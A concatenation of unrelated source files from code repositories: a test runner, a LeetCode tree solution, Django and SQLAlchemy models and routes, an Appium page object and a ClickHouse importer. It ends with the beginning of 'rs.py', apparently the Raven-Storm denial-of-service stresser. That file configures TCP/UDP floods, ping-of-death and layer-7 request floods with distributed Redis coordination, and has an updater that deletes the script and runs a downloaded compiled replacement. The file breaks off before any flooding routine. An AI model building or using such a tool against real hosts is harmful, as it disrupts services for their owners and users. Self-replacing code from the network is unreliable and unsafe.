# http://www.linkedin.com/in/harisekhon
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = 'Hari Sekhon'
__version__ = '0.1'
import glob
import inspect
import os
import subprocess
import sys
## using optparse rather than argparse for servers still on Python 2.6
#from optparse import OptionParser
# libdir = os.path.join(os.path.dirname(inspect.getfile(inspect.currentframe())), '..')
libdir = os.path.join(os.path.dirname(__file__), '..')
# sys.path.append(libdir)
# try:
# from harisekhon.utils import *
# except ImportError, e:
# print('module import failed: %s' % e)
# sys.exit(4)
def main():
    """Run every unit-test module in-process, in the order listed.

    Each test module exposes its own ``main``; each ``from ... import main``
    below rebinds the local name just before the following call, so the
    modules execute sequentially. They are imported (not run via
    subprocess) so that coverage tooling can follow the code.
    """
    print('running unit tests')
    # this doesn't allow coverage to follow the code and see what's been covered
    # for x in glob.glob(libdir + "/test/test_*.py"):
    #     if subprocess.call(['python', x]):
    #         sys.exit(2)
    #     subprocess.check_call(['python', x])
    from test.test_utils import main
    main()
    from test.test_cli import main
    main()
    from test.test_nagiosplugin import main
    main()
    from test.test_threshold import main
    main()
if __name__ == '__main__':
main()
| [
"harisekhon@gmail.com"
] | harisekhon@gmail.com |
f7a23f0389fe8115da3ae140207cef638d3ed979 | cb3634622480f918540ff3ff38c96990a1926fda | /PyProject/leetcode/history/symmetric-tree—2.py | 6a7f516c3065f6a3a5169f67922957b4efac8b15 | [] | no_license | jacksonyoudi/AlgorithmCode | cab2e13cd148354dd50a0487667d38c25bb1fd9b | 216299d43ee3d179c11d8ca0783ae16e2f6d7c88 | refs/heads/master | 2023-04-28T07:38:07.423138 | 2022-10-23T12:45:01 | 2022-10-23T12:45:01 | 248,993,623 | 3 | 0 | null | 2023-04-21T20:44:40 | 2020-03-21T14:32:15 | Go | UTF-8 | Python | false | false | 725 | py | # Definition for a binary tree node.
class TreeNode:
    """A binary-tree node holding a value and two (initially empty) child links."""
    def __init__(self, x):
        self.val = x
        self.left = self.right = None
class Solution:
    """Checks whether a binary tree is a mirror image of itself."""

    def isSymmetric(self, root):
        """Return True when the tree rooted at ``root`` is symmetric (empty counts)."""
        return True if root is None else self.isMirror(root.left, root.right)

    def isMirror(self, left, right):
        """Return True when the two subtrees are mirror images of each other."""
        if left is None and right is None:
            return True
        if left is None or right is None:
            return False
        if left.val != right.val:
            return False
        # Outer pair (left.left vs right.right) and inner pair must both mirror.
        return self.isMirror(left.left, right.right) and self.isMirror(left.right, right.left)
| [
"liangchangyoujackson@gmail.com"
] | liangchangyoujackson@gmail.com |
2fc6c3ca11a0533b9e305d1c97100d5ac134da5a | 7044043460c74a9c1c9d386bdeccb87289362f76 | /mysite/urls.py | 7794602ec06995938b9e62a0ce60bf93ca078cb7 | [] | no_license | KIMJONGIK/mysite | 6630682eca869b5122597baf2e2f59dd0b40869a | 84b908ea75602c7ca801eafb7dd975aadf70593b | refs/heads/master | 2022-12-09T14:33:38.741339 | 2020-09-16T11:48:53 | 2020-09-16T11:48:53 | 293,227,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,811 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import main.views as mainviews
import guestbook.views as guestbookviews
import user.views as userviews
import board.views as boardviews
urlpatterns = [
path('main/', mainviews.index),
path('guestbook/', guestbookviews.index),
path('guestbook/add', guestbookviews.add),
path('guestbook/deleteform', guestbookviews.deleteform),
path('guestbook/delete', guestbookviews.delete),
path('user/joinform', userviews.joinform),
path('user/joinsuccess', userviews.joinsuccess),
path('user/join', userviews.join),
path('user/loginform', userviews.loginform),
path('user/login', userviews.login),
path('user/logout', userviews.logout),
path('user/updateform', userviews.updateform),
path('user/update', userviews.update),
path('board/', boardviews.index),
path('board/write', boardviews.write),
path('board/register', boardviews.register),
path('board/view', boardviews.view),
path('board/delete', boardviews.delete),
path('board/modifyform', boardviews.modifyform),
path('board/modify', boardviews.modify),
path('admin/', admin.site.urls),
] | [
"kji089@naver.com"
] | kji089@naver.com |
ac4fd9d309800d992975cd86089adb1fcd92fcef | 0c2023f797f1d2f35bac45755214f9aefe58c5a9 | /appium_xueqiu/page/market.py | b6b3a5623c806da67c8651a1804e41641db1b385 | [] | no_license | yofy01/Hogwarts | d844500697879e160cdc6d6df5edc09da0093517 | 56089fca86086bf8b4733e053829a93215c7b6d3 | refs/heads/master | 2023-07-14T16:08:07.952038 | 2021-08-23T13:37:39 | 2021-08-23T13:37:39 | 393,095,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | # -*- coding:utf-8 -*-
from time import sleep
from selenium.webdriver.common.by import By
from appium_xueqiu.page.base_page import BasePage
from appium_xueqiu.page.search import Search
class Market(BasePage):
def goto_search(self):
'''进入搜索页'''
# click
self.steps('../page/search.yaml')
return Search(self._driver) | [
"450552640@qq.com"
] | 450552640@qq.com |
bd7de553f05fa1f867155984ed21d76ea04a8ccb | e9db99651ec062fb0c924d01e5f29dfcd8e9ec1d | /clickhouse_import.py | 77dc9bc0e2eff61c0b1ca4a9de5e5060509edf41 | [] | no_license | whspr/clickhouse_py_xml_importer | b14c0a5847a36f077e0dbaf1ed4b1a3b389bd50a | ee686ae151f80c9c151a6890b47e5f47a2e8477f | refs/heads/master | 2022-12-11T17:09:36.445944 | 2017-05-27T15:40:59 | 2017-05-27T15:40:59 | 92,607,136 | 5 | 0 | null | 2022-12-07T23:56:12 | 2017-05-27T15:28:02 | Python | UTF-8 | Python | false | false | 4,002 | py | __author__ = 'whspr'
from lxml import etree
from time import time
import datetime
from infi.clickhouse_orm import models as md
from infi.clickhouse_orm import fields as fd
from infi.clickhouse_orm import engines as en
from infi.clickhouse_orm.database import Database
class Data(md.Model):
    """
    ClickHouse table schema (infi.clickhouse_orm model) for imported offers.

    Every column except ``modified_time`` is stored as a string, mirroring
    the raw text pulled out of the source XML.
    """
    # Column definitions: one field per <offer> attribute/child tag.
    available = fd.StringField()
    category_id = fd.StringField()
    currency_id = fd.StringField()
    delivery = fd.StringField()
    description = fd.StringField()
    item_id = fd.StringField()
    modified_time = fd.DateField()
    name = fd.StringField()
    oldprice = fd.StringField()
    picture = fd.StringField()
    price = fd.StringField()
    sales_notes = fd.StringField()
    topseller = fd.StringField()
    # MergeTree engine keyed on modified_time with the listed columns as the
    # ordering key (presumably all non-date columns -- confirm against the
    # infi.clickhouse_orm MergeTree signature).
    engine = en.MergeTree('modified_time', ('available', 'category_id', 'currency_id', 'delivery',
                                            'description', 'item_id', 'name', 'oldprice', 'picture',
                                            'price', 'sales_notes', 'topseller'))
def safely_get_data(element, key):
    """
    Get the text of the first child of ``element`` whose tag equals ``key``.

    :param element: XML element whose children hold 'key: value' couples
    :param key: child tag name to look up
    :return: the child's text, or the string "not found" when the key is
             missing or ``element`` is not iterable

    Bug fix: the original fell through and returned ``None`` (instead of
    the documented "not found") when the key was simply absent, and its
    bare ``except`` hid unrelated errors.
    """
    try:
        for child in element:
            if child.tag == key:
                return child.text
    except TypeError:
        # ``element`` was not iterable at all (e.g. None).
        return "not found"
    # Key not present among the children.
    return "not found"
def parse_clickhouse_xml(filename, db_name, db_host):
    """
    Parse an XML feed of <offer> elements and bulk-insert it into ClickHouse.

    :param filename: path of the XML file to parse
    :param db_name: database name
    :param db_host: database host and port. Example: http://localhost:8123

    NOTE(review): this is Python 2 code (print statements); every offer is
    buffered in memory before a single bulk insert, so very large feeds
    will be memory-hungry.
    """
    data_buffer = []
    t = time()
    # start read file (iterparse streams the XML one <offer> at a time)
    for event, offer in etree.iterparse(filename, tag="offer"):
        # getting values
        available = offer.attrib['available']
        category_id = safely_get_data(offer, 'categoryId')
        currency_id = safely_get_data(offer, 'currencyId')
        delivery = safely_get_data(offer, 'delivery')
        description = safely_get_data(offer, 'description')
        item_id = offer.attrib['id']
        modified_time = safely_get_data(offer, 'modified_time')
        name = safely_get_data(offer, 'name')
        oldprice = safely_get_data(offer, 'oldprice')
        picture = safely_get_data(offer, 'picture')
        price = safely_get_data(offer, 'price')
        sales_notes = safely_get_data(offer, 'sales_notes')
        topseller = safely_get_data(offer, 'top_seller')
        # convert the unix timestamp to a YYYY-MM-DD date string
        # (raises if modified_time was missing and came back as a non-number)
        modified_time = datetime.datetime.fromtimestamp(int(modified_time)).strftime('%Y-%m-%d')
        # inserting data into clickhouse model representation
        insert_data = Data(
            available= available,
            category_id= category_id,
            currency_id= currency_id,
            delivery= delivery,
            description= description,
            item_id= item_id,
            modified_time= modified_time,
            name= name,
            oldprice= oldprice,
            picture= picture,
            price= price,
            sales_notes= sales_notes,
            topseller= topseller
        )
        # append this row to the pending batch
        data_buffer.append(insert_data)
        # free the parsed element so iterparse does not retain the whole tree
        offer.clear()
    # print elapsed time taken to prepare the batch of data instances
    print "time to prepare %s data %s" % (len(data_buffer), time() - t)
    # open database with database name and database host values
    db = Database(db_name, db_url=db_host)
    # create table to insert prepared data
    db.create_table(Data)
    t = time()
    # insert prepared data into database (single bulk insert)
    db.insert(data_buffer)
    print "time to insert %s" % (time() - t)
if __name__ == '__main__':
parse_clickhouse_xml(
'data.xml',
'database',
'http://localhost:8123'
) | [
"into.the.dissonance@gmail.com"
] | into.the.dissonance@gmail.com |
8fbf9b7344092e08c9267f703b7859249d1f88ef | 8717d1fbd4e9634d13e87e65d503aaac6ce3f4ca | /apps/products/models.py | f93950d5e69330cfd4a6565b4ea1e58bf88e223c | [] | no_license | asakeev01/Caravan | 679c1eae26647e162ba9b2cacff9960c177b247b | 84328f0ba91252c3c941aec5325ed60b074b45d6 | refs/heads/main | 2023-04-03T12:17:50.856731 | 2021-02-16T15:06:07 | 2021-02-16T15:06:07 | 339,434,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,518 | py | from django.db import models
from apps.categories.models import Category
class Product(models.Model):
    """A catalogue product; concrete purchasable variants live in ProductItem."""
    name = models.CharField(max_length = 255)
    description = models.TextField()
    # Reverse accessor on Category is ``products``.
    categories = models.ManyToManyField(Category, related_name = 'products')
    def __str__(self):
        return f'{self.name}'
class Colour(models.Model):
    """A colour option that product items can be offered in."""
    colour = models.CharField(max_length = 255)
    def __str__(self):
        return self.colour
class Size(models.Model):
    """A clothing size, with its hip and waist measurements (stored as text)."""
    size = models.CharField(max_length = 255)
    hip = models.CharField(max_length = 255)
    waist = models.CharField(max_length = 255)
    def __str__(self):
        return self.size
class ProductItem(models.Model):
    """A purchasable variant of a Product with its own price and colour options."""
    product = models.ForeignKey(Product, on_delete = models.CASCADE, related_name = "product_items")
    colour = models.ManyToManyField(Colour)
    price = models.DecimalField(max_digits = 10, decimal_places = 0)
    def __str__(self):
        # Bug fix: removed a leftover debug ``print(self.colour)`` that wrote
        # to stdout every time the item was rendered as a string.
        return f"{self.product.name}'s item of {self.price}"
class Quantity(models.Model):
    """Stock level of one ProductItem in one Size (unique per item/size pair)."""
    product_item = models.ForeignKey(ProductItem, on_delete = models.CASCADE, related_name = "quantities")
    size = models.ForeignKey(Size, on_delete = models.CASCADE)
    quantity = models.PositiveIntegerField()
    class Meta:
        # One stock row per (item, size) combination.
        unique_together = ('product_item', 'size',)
        verbose_name = 'Quantity'
        verbose_name_plural = 'Quantities'
    def __str__(self):
        return f'The size {self.size} of {self.product_item.product.name} '
| [
"aidar.asakeev@gmail.com"
] | aidar.asakeev@gmail.com |
aedf4a7758d37e8f75483ebed1e2b39b589cc08d | c25ba294568ac36a04ae241511dbe012b3eaccfb | /Server/20180916213520426/Python/Server/Mark.py | bf976db936969b8c0211cf4b42c24236795d288b | [] | no_license | biabeniamin/CatalogScolarTeams | 1a502bc78c63be1a61ec5917835e2319bb7402dc | 247005895379683c510866500bb4a9ebf088c6c5 | refs/heads/master | 2023-02-16T16:58:46.333565 | 2021-01-19T19:59:02 | 2021-01-19T19:59:02 | 320,657,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,974 | py | #generated automatically
from sqlalchemy.orm import backref, relationship
from sqlalchemy.orm import validates
from SqlAlchemy import Base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import *
from sqlalchemy.dialects.mysql import DOUBLE
from ValidationError import ValidationError, validate_integer
from flask_restful import reqparse
import datetime
from math import floor
from Teacher import Teacher, getTeachers, getTeachersByTeacherId
from Student import Student, getStudents, getStudentsByStudentId
from Classe import Classe, getClasses, getClassesByClasseId
class Mark(Base):
    """SQLAlchemy model for the ``Marks`` table: one grade a teacher gave a
    student in a class. (The module header says this file is generated
    automatically.)"""
    @declared_attr
    def __tablename__(cls):
        return 'Marks'
    # Scalar fields
    markId = Column('MarkId', Integer, primary_key=True)
    value = Column('Value', Integer)
    date = Column('Date', DateTime)
    creationTime = Column('CreationTime', DateTime, default=datetime.datetime.utcnow)
    # Foreign keys plus their relationships; the bare ``classe``/``student``/
    # ``teacher`` attributes start as SQL null placeholders and are replaced
    # per-row by the complete* helper functions below.
    classeId = Column('ClasseId', Integer, ForeignKey("Classes.ClasseId"))
    classes = relationship(Classe,backref = backref('marks'))
    classe = null
    studentId = Column('StudentId', Integer, ForeignKey("Students.StudentId"))
    students = relationship(Student,backref = backref('marks'))
    student = null
    teacherId = Column('TeacherId', Integer, ForeignKey("Teachers.TeacherId"))
    teachers = relationship(Teacher,backref = backref('marks'))
    teacher = null
    # Validation: the third argument presumably flags the field as
    # required/nullable -- confirm against ValidationError.validate_integer.
    @validates('classeId')
    def validate_classeId(self, key, value):
        return validate_integer(key, value, True)
    @validates('studentId')
    def validate_studentId(self, key, value):
        return validate_integer(key, value, True)
    @validates('teacherId')
    def validate_teacherId(self, key, value):
        return validate_integer(key, value, True)
    @validates('value')
    def validate_value(self, key, value):
        return validate_integer(key, value, False)
#Functions
# complete classes function
def completeClasses(session, marks):
    """Attach the matching ``Classe`` object to each mark (matched on classeId).

    Marks whose ``classeId`` has no matching row keep the class-level
    default attribute, as before.

    Fix: the original hand-rolled binary search silently required
    getClasses() to return rows sorted by classeId and raised IndexError
    when the list was empty; a dict lookup is O(n + m) and order-independent.
    """
    classes_by_id = {c.classeId: c for c in getClasses(session)}
    for row in marks:
        match = classes_by_id.get(row.classeId)
        if match is not None:
            row.classe = match
    return marks
# complete students function
def completeStudents(session, marks):
    """Attach the matching ``Student`` object to each mark (matched on studentId).

    Marks whose ``studentId`` has no matching row keep the class-level
    default attribute, as before.

    Fix: the original hand-rolled binary search silently required
    getStudents() to return rows sorted by studentId and raised IndexError
    when the list was empty; a dict lookup is O(n + m) and order-independent.
    """
    students_by_id = {s.studentId: s for s in getStudents(session)}
    for row in marks:
        match = students_by_id.get(row.studentId)
        if match is not None:
            row.student = match
    return marks
# complete teachers function
def completeTeachers(session, marks):
    """Attach the matching ``Teacher`` object to each mark (matched on teacherId).

    Marks whose ``teacherId`` has no matching row keep the class-level
    default attribute, as before.

    Fix: the original hand-rolled binary search silently required
    getTeachers() to return rows sorted by teacherId and raised IndexError
    when the list was empty; a dict lookup is O(n + m) and order-independent.
    """
    teachers_by_id = {t.teacherId: t for t in getTeachers(session)}
    for row in marks:
        match = teachers_by_id.get(row.teacherId)
        if match is not None:
            row.teacher = match
    return marks
# get function
def getMarks(session):
    """Return every Mark row with its classe, student and teacher attached."""
    rows = session.query(Mark).all()
    for attach in (completeClasses, completeStudents, completeTeachers):
        rows = attach(session, rows)
    return rows
# dedicated get-request functions
def getMarksByClasseIdStudentId(session, classeId, studentId):
    """Return all marks of one student in one class, with relations attached."""
    rows = session.query(Mark).filter(Mark.classeId == classeId, Mark.studentId == studentId).all()
    for attach in (completeClasses, completeStudents, completeTeachers):
        rows = attach(session, rows)
    return rows
def getMarksByStudentId(session, studentId):
    """Return all marks of one student, with relations attached."""
    rows = session.query(Mark).filter(Mark.studentId == studentId).all()
    for attach in (completeClasses, completeStudents, completeTeachers):
        rows = attach(session, rows)
    return rows
def getMarksByMarkId(session, markId):
    """Return the mark(s) with the given primary key, with relations attached."""
    rows = session.query(Mark).filter(Mark.markId == markId).all()
    for attach in (completeClasses, completeStudents, completeTeachers):
        rows = attach(session, rows)
    return rows
# add function
def addMark(session, mark):
    """Insert ``mark`` (stamping creationTime), attach its relations, return it."""
    mark.creationTime = datetime.datetime.utcnow()
    session.add(mark)
    session.commit()
    # This print must stay: accessing mark.markId forces SQLAlchemy to query
    # the database and populate the generated primary key.
    print('Value inserted with markId=', mark.markId)
    # Eagerly attach the related objects for the caller/serializer.
    mark.teacher = getTeachersByTeacherId(session, mark.teacherId)[0]
    mark.student = getStudentsByStudentId(session, mark.studentId)[0]
    mark.classe = getClassesByClasseId(session, mark.classeId)[0]
    return mark
# update function
def updateMark(session, mark):
    """Persist the new field values of ``mark`` and return the refreshed row.

    Bug fix: the original did ``result = mark`` after querying, which only
    rebound a local variable -- nothing in the session changed, so the
    commit persisted nothing. ``session.merge`` copies the incoming state
    onto the persistent row identified by the primary key.
    """
    session.merge(mark)
    session.commit()
    # Re-read the row and attach its relations, as the original did.
    result = session.query(Mark).filter(Mark.markId == mark.markId).first()
    result.teacher = getTeachersByTeacherId(session, result.teacherId)[0]
    result.student = getStudentsByStudentId(session, result.studentId)[0]
    result.classe = getClassesByClasseId(session, result.classeId)[0]
    return result
# delete function
def deleteMark(session, markId):
    """Delete the mark with the given id and return the removed object."""
    doomed = session.query(Mark).filter(Mark.markId == markId).first()
    session.delete(doomed)
    session.commit()
    return doomed
#API endpoints
# request parser function
def getmarkRequestArguments():
    """Build the reqparse parser accepted by the Mark API endpoints."""
    parser = reqparse.RequestParser()
    for field in ('classeId', 'studentId', 'teacherId', 'value', 'date'):
        parser.add_argument(field)
    return parser
| [
"biabeniamin@outlook.com"
] | biabeniamin@outlook.com |
5805016b6deb1eb7bbccac74feb8dc8aebe20e1f | 682a16bc7705f16af80b87775780ecb41c7fb1d5 | /rs.py | 353aa60f04c850e268adb741b2de57ce7e5e8d74 | [
"MIT"
] | permissive | dannydeleon8998/RapeStresser | 4e4feea9d306c24ce4ca1575e4d6857e1c3eb4c5 | 3521997cb3baff5fd4955ca5fa4edc2d41f675b4 | refs/heads/master | 2022-04-27T07:39:55.382610 | 2020-04-28T02:29:29 | 2020-04-28T02:29:29 | 259,509,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,555 | py | # MIT LICENCE Taguar258 2020
# Please read the Licence to know your permissions.
argvexit = False
try:
import socket
import os
import sys
import time
from threading import Thread
import urllib2
import re
import redis
import pickle
import wget
import nmap
try:
import readline
except:
pass
import requests
except Exception as e:
print("Imports could not be done/missing imports.")
print("All imports of file: (socket, os, sys, time, threading, urllib2, pickle, re), redis, wget, nmap.")
print(e)
sys.exit()
if argvexit:
sys.exit()
try:
if "--update" == sys.argv[1]:
try:
os.system("rm -i %s" % sys.argv[0])
wget.download("https://github.com/Taguar258/Raven-Storm/blob/master/rs.pyo?raw=true ")
os.system("mv rs.pyo?raw=true %s" % sys.argv[0])
except:
print("Error.")
sys.exit()
except:
pass
rsversion = "2.8"
ip = ""
port = 80
messages = 'hello its me, rs'
threads = 160
rtxt = 1
messagezw = messages
sleepy = 0
timeforstress = 0.5
stresserror = "false"
stressstep = 2
runactive = 'true'
outtxt = "true"
outtxtmute = False
zwouttxt = "true"
modeh = "false"
stress = "false"
stresstestvar = 1
setmb = 0
helphelp = 'true'
autostart = 0
autostop = 0
autostep = 0
autostarttime = 0
# list
listwebtext = ""
listweblist = "" # << will become array
listwebtrue = "false"
listportstext = ""
listportslist = "" # << will become array
listportstrue = "false"
# ddos | new:
hclient = False
hserver = False
hip = "127.0.0.1"
hport = "6379"
myclid = 1
#method: udp, tcp
socketmethod = "tcp"
runcomonstart = []
# pod
podtarget = ""
podsize = 65500
podmaxsize = 65500
podminsize = 5
podthreads = 30
podsleep = 0
podautodl = 0
podinterval = 0
layersevenmethod = ["REQUEST"]
layersevenpostvar = ""
layersevenposttxt = ""
layersevengetvar = ""
layersevengettxt = ""
layerseventarget = ""
layerseventhreads = 200
layerseveninterval = 0
layersevensleep = 0
nmapinstalledq = False
userissueshva = False
try:
nm = nmap.PortScanner()
nmapinstalledq = True
except:
print("Please install nmap.")
print("Some functions will not work without it.")
try:
raw_input("[Press enter to continue without nmap]")
except:
sys.exit()
# verbosed:
verbosed = False
try:
if "-dv" in sys.argv:
verbosed = True
except:
verbosed = False
if verbosed:
print("[Verbosed True]")
import pdb
#pdb.set_trace()
# help
if "-h" in sys.argv or "--help" in sys.argv:
print("Please have a look at the RavenStorm documentation. [c, ros, f]")
sys.exit()
if "-dgcn" in sys.argv:
print("Made by Taguar258. JL")
sys.exit()
# automated
lister = []
try:
lister = pickle.load(open("ravenstorm-automated-list.ravenstormlist", "r"))
if verbosed:
print(lister)
except:
lister = []
iplister = 0
portlister = 0
threadslister = 0
messageslister = 0
rtxtlister = 0
sleepylister = 0
outtxtlister = 0
outtxtmutelister = 0
hiplister = 0
hportlister = 0
socketmethodlister = 0
podsizelister = 0
podthreadslister = 0
podsleeplister = 0
podautodllister = 0
podintervallister = 0
iplisterstandard = ip
portlisterstandard = port
threadslisterstandard = threads
messageslisterstandard = messages
rtxtlisterstandard = rtxt
sleepylisterstandard = sleepy
outtxtlisterstandard = outtxt
outtxtmutelisterstandard = outtxtmute
hiplisterstandard = hip
hportlisterstandard = hport
socketmethodlisterstandard = socketmethod
podsizelisterstandard = podsize
podthreadslisterstandard = podthreads
podsleeplisterstandard = podsleep
podautodllisterstandard = podautodl
podintervallisterstandard = podinterval
if len(lister) != 0:
try:
for listinglister in lister:
if listinglister[0] == "ip":
if iplister == 0:
ip = listinglister[1]
iplisterstandard = listinglister[1]
iplister = int(listinglister[2])
elif int(listinglister[2]) > int(iplister):
ip = listinglister[1]
iplisterstandard = listinglister[1]
iplister = int(listinglister[2])
elif listinglister[0] == "port":
if portlister == 0:
port = listinglister[1]
portlisterstandard = listinglister[1]
portlister = int(listinglister[2])
elif int(listinglister[2]) > int(portlister):
port = listinglister[1]
portlisterstandard = listinglister[1]
portlister = int(listinglister[2])
elif listinglister[0] == "threads":
if threadslister == 0:
threads = listinglister[1]
threadslisterstandard = listinglister[1]
threadslister = int(listinglister[2])
elif int(listinglister[2]) > int(threadslister):
threads = listinglister[1]
threadslisterstandard = listinglister[1]
threadslister = int(listinglister[2])
elif listinglister[0] == "messages":
if messageslister == 0:
messages = listinglister[1]
messageslisterstandard = listinglister[1]
messageslister = int(listinglister[2])
elif int(listinglister[2]) > int(messageslister):
messages = listinglister[1]
messageslisterstandard = listinglister[1]
messageslister = int(listinglister[2])
elif listinglister[0] == "rtxt":
if rtxtlister == 0:
rtxt = listinglister[1]
rtxtlisterstandard = listinglister[1]
rtxtlister = int(listinglister[2])
elif int(listinglister[2]) > int(rtxtlister):
rtxt = listinglister[1]
rtxtlisterstandard = listinglister[1]
rtxtlister = int(listinglister[2])
elif listinglister[0] == "sleepy":
if sleepylister == 0:
sleepy = listinglister[1]
sleepylisterstandard = listinglister[1]
sleepylister = int(listinglister[2])
elif int(listinglister[2]) > int(sleepylister):
sleepy = listinglister[1]
sleepylisterstandard = listinglister[1]
sleepylister = int(listinglister[2])
elif listinglister[0] == "outtxt":
if outtxtlister == 0:
outtxt = listinglister[1]
outtxtlisterstandard = listinglister[1]
outtxtlister = int(listinglister[2])
elif int(listinglister[2]) > int(outtxtlister):
outtxt = listinglister[1]
outtxtlisterstandard = listinglister[1]
outtxtlister = int(listinglister[2])
elif listinglister[0] == "outtxtmute":
if outtxtmutelister == 0:
outtxtmute = listinglister[1]
outtxtmutelisterstandard = listinglister[1]
outtxtmutelister = int(listinglister[2])
elif int(listinglister[2]) > int(outtxtmutelister):
outtxtmute = listinglister[1]
outtxtmutelisterstandard = listinglister[1]
outtxtmutelister = int(listinglister[2])
elif listinglister[0] == "hip":
if hiplister == 0:
hip = listinglister[1]
hiplisterstandard = listinglister[1]
hiplister = int(listinglister[2])
elif int(listinglister[2]) > int(hiplister):
hip = listinglister[1]
hiplisterstandard = listinglister[1]
hiplister = int(listinglister[2])
elif listinglister[0] == "hport":
if hportlister == 0:
hport = listinglister[1]
hportlisterstandard = listinglister[1]
hportlister = int(listinglister[2])
elif int(listinglister[2]) > int(hportlister):
hport = listinglister[1]
hportlisterstandard = listinglister[1]
hportlister = int(listinglister[2])
elif listinglister[0] == "method":
if socketmethodlister == 0:
socketmethod = listinglister[1]
socketmethodlisterstandard = listinglister[1]
socketmethodlister = int(listinglister[2])
elif int(listinglister[2]) > int(socketmethodlister):
socketmethod = listinglister[1]
socketmethodlisterstandard = listinglister[1]
socketmethodlister = int(listinglister[2])
elif listinglister[0] == "podsize":
if podsizelister == 0:
podsize = listinglister[1]
podsizelisterstandard = listinglister[1]
podsizelister = int(listinglister[2])
elif int(listinglister[2]) > int(podsizelister):
podsize = listinglister[1]
podsizelisterstandard = listinglister[1]
podsizelister = int(listinglister[2])
elif listinglister[0] == "podthreads":
if podthreadslister == 0:
podthreads = listinglister[1]
podthreadslisterstandard = listinglister[1]
podthreadslister = int(listinglister[2])
elif int(listinglister[2]) > int(podthreadslister):
podthreads = listinglister[1]
podthreadslisterstandard = listinglister[1]
podthreadslister = int(listinglister[2])
elif listinglister[0] == "podsleep":
if podsleeplister == 0:
podsleep = listinglister[1]
podsleeplisterstandard = listinglister[1]
podsleeplister = int(listinglister[2])
elif int(listinglister[2]) > int(podsleeplister):
podsleep = listinglister[1]
podsleeplisterstandard = listinglister[1]
podsleeplister = int(listinglister[2])
elif listinglister[0] == "podinterval":
if podintervallister == 0:
podinterval = listinglister[1]
podintervallisterstandard = listinglister[1]
podintervallister = int(listinglister[2])
elif int(listinglister[2]) > int(podintervallister):
podinterval = listinglister[1]
podintervallisterstandard = listinglister[1]
podintervallister = int(listinglister[2])
elif listinglister[0] == "podautodl":
if podautodllister == 0:
podautodl = listinglister[1]
podautodllisterstandard = listinglister[1]
podautodllister = int(listinglister[2])
elif int(listinglister[2]) > int(podautodllister):
podautodl = listinglister[1]
podautodllisterstandard = listinglister[1]
podautodllister = int(listinglister[2])
except Exception as ee:
pass
def listeradd(where, value, lister):
try:
coni = False
nnn = 0
for zw, l in enumerate(lister):
if l[1] == value:
coni = True
nnn = zw
if coni:
for zw, l in enumerate(lister):
if zw == nnn:
l[2] += l[2]
else:
lister.insert(0, [where, value, 1])
return lister
except:
return lister
argvexit = False
try:
if "-ros" in sys.argv:
runcomonstart = " ".join(sys.argv).split("-ros ")[1].split(" -")[0].split(", ")
except Exception as e:
print("Error", e)
argvexit = True
#red
try:
if "-dred" in sys.argv:
os.system("for key in $(redis-cli -p 6379 keys \\*); do echo \"Key : '$key'\" ; redis-cli -p 6379 GET $key; done")
argvexit = True
except:
pass
# config file
try:
if "-c" in sys.argv:
conffile = " ".join(sys.argv).split("-c")[1][1:].split(" ")[0]
if os.path.isfile(conffile):
for g in open(conffile, "r").read().split("\n"):
if "" != g:
try:
i = ""
i = g.split(" = ")
if verbosed:
print(i[0], i[1])
if i[0] == "ip":
ip = str(i[1])
elif i[0] == "port":
port = int(i[1])
elif i[0] == "threads":
threads = int(i[1])
elif i[0] == "message":
messages = str(i[1])
elif i[0] == "repeat":
messages = (messages * i[1])
elif i[0] == "sleep":
sleepy = float(i[1])
elif i[0] == "output":
messages = str(i[1])
elif i[0] == "stress":
stress = str(i[1])
elif i[0] == "stressstep":
stressstep = int(i[1])
elif i[0] == "mb":
rtxt = int(int(setmb) / 0.000001)
elif i[0] == "autostart":
autostart = int(i[1])
elif i[0] == "autostop":
autostop = int(i[1])
elif i[0] == "autostep":
autostep = int(i[1])
elif i[0] == "hip":
hip = str(i[1])
elif i[0] == "hport":
hport = int(i[1])
elif i[0] == "runonstart":
runcomonstart = i[1].split(", ")
elif i[0] == "method":
socketmethod = str(i[1])
elif i[0] == "pod target":
podtarget = i[1]
elif i[0] == "pod threads":
podthreads = int(i[1])
elif i[0] == "pod size":
podsize = int(i[1])
elif i[0] == "pod sleep":
podsleep = float(i[1])
elif i[0] == "pod interval":
podinterval = int(i[1])
elif i[0] == "pod auto stop":
podautodl = int(i[1])
except Exception as i:
print("Error:", i)
argvexit = True
else:
print("No such config file.", conffile)
argvexit = True
except:
pass
if argvexit:
sys.exit()
if verbosed:
raw_input("")
os.system("clear")
print("Starting...")
# Update
print("Checking for updates...")
print("Current version: %s" % rsversion)
checkstatusofrepository = ""
if verbosed:
print("[Check: Version]")
try:
checkstatusofrepository = urllib2.urlopen("https://github.com/Taguar258/Raven-Storm/wiki/Version").read()
time.sleep(0.2)
if not ("Version:%s" % rsversion) in checkstatusofrepository:
print("")
print("There is a new version, feel free to update it:")
print("")
updateresult = re.search('Info:(.*):Info', checkstatusofrepository)
print(updateresult.group(1).replace("\\n", "\n"))
print("")
try:
raw_input("[Press enter]")
except:
pass
except:
pass
def inporarg(label, comname, com):
if verbosed: print("[INPUT or ARGUMENT]")
if verbosed: print("[Lable: %s]" % label)
if verbosed: print("[ComName: %s]" % comname)
if verbosed: print("[Com: %s]" % com)
if verbosed: print("[%s]" % com.split("%s " % comname))
if len(com.split("%s " % comname)) == 2:
if verbosed: print("[ONLY 2 LEN]")
if com.split("%s " % comname)[1] == "":
if verbosed: print("[2 LEN BLANC]")
zw = raw_input("\033[1;32;40m %s: " % label)
else:
if verbosed: print("[2 LEN not Blanc]")
zw = com.split("%s " % comname)[1]
print("\033[1;32;40m %s: %s" % (label, zw))
else:
